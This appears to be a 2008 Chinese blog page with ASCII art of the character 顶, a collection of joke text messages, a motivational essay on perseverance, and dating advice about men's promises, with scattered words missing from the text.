................顶:::::::::顶::::::::::::::::::::::::::顶
................顶:::::::::顶:::::::::::::::::::::::::顶
.................顶:::::::顶:::::::::::::::::::::::::顶
..................顶::::::顶::::::::::::::::::::::::顶
..................顶:::::顶::::::::::::::::::::::::顶
...................顶:::顶::::::::::::::::::::::::顶
...................顶::顶::::::::::::::::::::::::顶
....................顶:顶:::::::::::::::::::::::顶
....................顶顶:::::::::::::::::::::::顶
....................顶顶::::::::::::::::::::::顶
....................顶顶:::::::::::::::::::::顶
....................顶顶:::::顶:::::::::顶顶
....................顶顶::::顶顶:::::::顶顶
....................顶顶::::::顶顶:::::顶顶
.....................顶顶:::::::::::::::::顶顶
.....................顶顶::::顶:::::::::::顶顶
......................顶顶::顶顶顶:::::::顶顶
......................顶顶::顶顶顶:::::::顶顶
......................顶顶:::顶顶:::::::::::::顶
.......................顶顶::顶顶:::::::::::::顶
.......................顶顶::顶顶:::::::::::::顶
.......................顶顶:::顶:::::::::::::::顶
.......................顶顶::::::::::::::::::::顶
.......................顶顶::::::::::::::::::::顶
.......................顶顶:::::::::::::::::::顶
.......................顶顶:::::::::::::::::::顶
.......................顶顶::::::::::::::::::顶
........................顶顶:::::::::::::::::顶
........................顶顶:::::::::::::::::顶
........................顶顶:::::::::::::::::顶
........................顶顶:::::::::::::::::顶
........................顶顶:::::::::::::::::顶
.........................顶顶:::::::::::::::顶
.........................顶顶:::::::::::::::顶
.........................顶顶:::::::::::::::顶
.........................顶顶::::::::::::::顶
..........................顶顶:::::::::::::顶
..........................顶顶:::::::::::::顶
..........................顶顶:::::::::::::顶
..........................顶顶::::::::::::顶
..........................顶顶::::::::::::顶
...........................顶顶:::::::::::顶
...........................顶顶::::::::::顶
...........................顶顶::::::::::顶
............................顶顶::::::::顶
............................顶顶::::::::顶
............................顶顶::::::::顶
.............................顶顶:::::::顶
.............................顶顶:::::::顶
..............................顶顶::::::顶
..............................顶顶::::::顶
..............................顶顶::::::顶
..............................顶顶::::::顶
..............................顶顶::::::顶
..............................顶顶::::::顶
.............................顶顶:::::::顶
............................顶:顶::::::::顶
............................顶:顶:::::::::顶
............................顶:顶::::::::::顶
............................顶:顶:::::::::::顶
............................顶:顶::::::::::::顶
............................顶:顶:::::::::::::顶
............................顶:顶::::::::::::::顶
............................顶顶:::::::::::::::::顶
..............................顶顶::::::::::::::::顶
................................顶顶顶:::::::::顶顶
..................................顶顶::顶::::顶顶
...................................顶顶顶顶顶顶顶
( Thu, 21 Feb 2008 13:26:03 +0800 )
Description:
一家房地产商为推销房屋,打出“买房子,送家具”的广告。某人买了一套新房,装饰后去领家具。房产商:你的家具在哪里?我们帮你送!
话说在一个夜黑风高的夜晚,就在那条最长,最可怕的路上,出租车司机开过那里,有个妇人在路旁招手上了车。
一路上蛮安静的,直到那妇人说话了。她对司机说:“苹果给你吃,很好吃的哦……”
司机觉得很棒就拿了,接着吃了一口。
那妇人问:“好吃吗?”
司机说:“好吃呀!”
妇人又回了一句:“记得我生前也
吃苹果啊……”
哇……司机一听到,吓得紧急刹车,面色翻白……
只见那妇人慢慢把头倾到前面,对司机说:“但我在生完小孩后就不喜欢吃了!……”
昨天梦见上帝他说
我一个愿望,我拿出地球仪说要世界和平,他说太难了换一个吧,我拿出你的照片说要这人变漂亮。他沉思了一下说拿地球仪我再看看。
男:我真的爱你,求你做我的
女:可是我对你根本就
男:那好,你告诉我我哪一点不好,我改!!!
女:那你先告诉我我哪一点好,我~改!!!!
母老鼠怀疑老公有外遇,她跟踪老公到草丛旁。一会儿一只刺猬钻出来。母老鼠一把拽住刺猬:死鬼,还说没外遇,擦这么多摩丝去勾引谁呀?
一天,你遇到狮子,故作镇定,用
瞪狮子。突然狮子双手合十并跪了下来,你得意地说:知道厉害了吧!少顷,狮子幽幽地道:祷告完毕,可以用餐了。
一个消化不良的病人向医生抱怨:我近来很不正常,吃什么拉什么,吃黄瓜拉黄瓜,吃西瓜拉西瓜,怎样才能恢复正常呢?医生
片刻,那你只能吃屎了。
曾经有个
要与我共赴黄泉--“你再不还我钱,我就和你同归于尽!”
曾经有个女孩子与我相约到下辈子--“想追求我?下辈子吧!”
曾经有个女孩子肯为我而死--“跟你在一起,我宁愿死!”
一醉汉不慎从三楼掉下,引来路人围观,一***过来:发生什么事?醉汉:不清楚,我也是刚到!
老鼠:我现在正和蝙蝠
,以后孩子们就
在空中,不怕你们猫了。猫冷笑一声,指着树上的猫头鹰说:看见没有,我正在和它恋爱!
小杜克央求
“你去向
要点钱,咱们两个看电影去。”“要去你自己去,妈妈又不光是我一个人的”“可你跟妈妈认识得早一些嘛!”
两个相爱的玉米粒决定结婚,可是婚礼时找不到新娘了,新郎问一直跟在身边的一个爆米花,爆米花害羞地说:讨厌,人家穿的是婚纱!
你半夜三更,起来解手忘了拉灯,一不小心掉进茅坑,拼命挣扎壮烈牺牲,,诗人亲笔题词:生的荒唐,死的窝囊!
朋友你即将远行
凛冽的寒风挡不住我们的友情
我握着你的手,深情的说:
好好改造,争取减刑!
老虎读了三国以后去抓野猪,见猪窝无一猪,摸摸胡须说:空城计!转身就兽夹上有一死猪,大惊:苦肉计!忽然又见到了你,大喜:哎哟,还有美人计!
你站在阳台上,享受细雨的朦胧,想到
,你的脸湿了,嘴角有一种酸苦涩咸的味道.是雨水还是泪水?你抬头仰望天空:我靠,谁家小孩在楼上撒尿!
你到云南西双版纳旅游,途中遇到一群野猪的围攻,旅客均掏出食品,金钱,野猪不为所动,你掏出仅有的***,群野猪跪而痛哭道:“老大,我们可找到你了。”
狼入侵,小动物成立敢死队对抗。螳螂:我有双刀。刺猬:我满身都是暗器。天牛边晃触角边唱:哼!我有双节棍双节棍!哼哼哈哈!
知道我们为何有缘吗?早在一千年前我们就认识了,是个秋天,你随我在风里跑,在我身上留下了牙印,这事成了千古佳话。
那时,我叫吕洞宾。
我有一个请求:请我吃饭。
能满足我,否则我就把你的手机号写在墙上,前面再加两个字:***。还要请我吃好的,要不就写:征婚,条件不限。
大话电脑:显示器:我好惨啊,整天被人看。键盘说:我更惨呢,每天被人打。鼠标:我才惨呢,每天被人摸。主机:你们有我惨吗?每天被人按肚脐眼!
( Thu, 21 Feb 2008 13:23:52 +0800 )
Description:
人们是怎样从米的白、高粱的红、葡萄的紫里发现了酒的透明与清醇? 传说有两个人与神仙邂逅,神仙授他们酿酒之法,叫他们选端阳那天饱满起来的米,冰雪初融时高山流泉的水,调和了,注入深幽无人处千年紫砂土铸成的陶瓮,再用初夏第一张看见朝阳的新荷覆紧,密闭七七四十九天,直到鸡叫三遍后方可启封。 像每一个传说里的英雄一样,他们历尽千辛万苦,找齐了所有的材料,把
一起调和密封,然后潜心
那个时刻。 多么漫长的等待啊。第四十九天到了,两人整夜都不能寐,等着鸡鸣的声音。远远地,传来了第一声鸡鸣,过了很久,依稀响起了第二声。第三遍鸡鸣到底什么时候才会来?其中一个再也忍不住了,他打开了他的陶瓮,惊呆了,里面的一汪水,像醋一样酸。大错已经铸成,不可挽回,他失望地把它洒在了地上。 而另外一个,虽然也是按捺不住想要伸手,却还是咬着牙,坚持到了三遍鸡鸣响彻天光。多么甘甜清澈的酒啊!只是多等了一刻而已。从此,“酒”与“洒”的区别,就只在那看似非常普通的一横。 而许多
者,他们与
者的区别,往往不是机遇或是更聪明的头脑,只在于成功者多坚持了一刻——有时是一年,有时是一天,有时,仅仅只是一遍鸡鸣。 在古老的东方,挑选小公牛到竞技场格斗有一定的程序。它们被带进场地,向手待长矛的斗牛士攻击,裁判以它受戳后再向斗牛士进攻的次数多寡来评定这只公牛的勇敢程度。从今往后,我须承认,我的生命每天都在接受类似的考验。如果我坚忍不拔,勇往直前,迎接挑战,那么我一定会成功。 我不是为了失败才来到这个世界上的,我的血管里也没有失败的血液在流动。我不是任人鞭打的羔羊,我是猛狮,不与羊群为伍。我不想听失意者的哭泣,抱怨者的牢骚,这是羊群中的瘟疫,我不能被它传染。失败者的屠宰场不是我
的归宿。 生命的奖赏远在旅途
,而非起点附近。我不知道要走多少步才能达到
,踏上第一千步的时候,仍然可能遭到失败。但成功就藏在拐角后面,除非拐了弯,我永远不知道还有多远。 再前进一步,如果没有用,就再向前一点。事实上,每次进步一点点并不太难。 从今往后,我承认每天的
就像对参天大树的一次砍击,头几刀可能了无痕迹。每一击看似微不足道,然而,累积起来,巨树终会倒下。这恰如我今天的
。 就像冲洗高山的雨滴,吞噬猛虎的蚂蚁,照亮大地的星辰,建起金字塔的奴隶,我也要一砖一瓦地建造起自己的城堡,因为我深知水滴石穿的道理,只要持之以恒,什么都可以做到。 我绝不考虑失败,我的字典里不再有
、不可能、办不到、没法子、成问题、失败、行不通、没
、退缩……这类愚蠢的字眼。我要尽量避免
,一旦受到它的威胁,立即想方设法向它挑战。我要辛勤耕耘,忍受苦楚。我放眼未来,勇往直前,不再理会脚下的障碍。我坚信,沙漠尽头必是绿洲。 我要牢牢记住古老的平衡法则,鼓励自己坚持下去,因为每一次的失败都会增加下一次成功的机会。这一次的拒绝就是下一次的赞同;这一次皱起眉头就是下一次舒展的
;今天的不幸,往往预示着明天的好运。夜幕降临,回想一天的遭遇,我总是心存感激。我深知,只有失败多次,才能成功。 我要尝试,尝试,再尝试。障碍是我成功路上的弯路,我迎接这项挑战。我要像水手一样,乘风破浪。 从今往后,我要借鉴别人成功的秘诀。过去的是非成败,我全不计较,只抱定
,明天会更好。当我精疲力竭时,我要抵制回家的诱惑,再试一次。我一试再试,争取每一天的成功,避免以失败收场。我要为明天的成功播种,超过那些按就班的人。在别人停滞不前时,我继续拼搏,终有一天我会丰收。 我不因昨日的成功而
,因为这是失败的先兆。我要忘却昨日的一切,是好是坏,都让它随风而去。我信心百倍,迎接新的太阳,
"今天是此生最好的一天"。 只要我一息尚存,就要坚持到底,因为我已深知成功的秘诀:坚持不懈,终会成功。
( Thu, 21 Feb 2008 13:21:48 +0800 )
Description:
世界上有三样东西不能
:男生的承诺、男生的
、男生的理由。如果他给过你天长地久的承诺,是因为他自己对你们之间的那份感情都没把握;如果他说你是他一生最深的(唯一的)爱,这表示他一定对别的女生说过同样的话;如果他失约,给了你若干的理由,千万不要信以为真,男生是编造理由方面的高手,他的种种理由归根结底只有两个字:借口。 男生在承诺的时候固然是真心,在
的时候也是实意。他不再爱你,明明是他变心了,但他却只会认为是你当初吸引他的那些特质消失了。 若你对一个男生发生了兴趣,就别在他面前展示你的才智。因为如果你爱上的是一个傻男生,他根本不懂得你那些聪明才智是做什么用的;而一个本身很聪明的男生绝不会爱上一个聪明的女生,因为聪明的男生已经很累了,他深知和一个聪明女生在一起会更累。当然,两人是准备用头脑联姻合打一片江山则不在此限。若是你一定要展现你的才华智慧,最好在发表完你的高见之后加上“你这么聪明,我不说你都知道的”,“你应该比我还明白,还用得着我说吗”之类的话。 看一个男生爱不爱你的最好方面,是看他愿不愿意把你引入他的世界当中,认识他周围的那些
,特别是他的
。若一个男生不肯把你介绍给他的父母,说明他绝对不爱你,千万别上当。若是已经上当的,就最好抱着“酒后失身,不必当真”的
了,这样,虽然不能
,但至少挽回了面子。
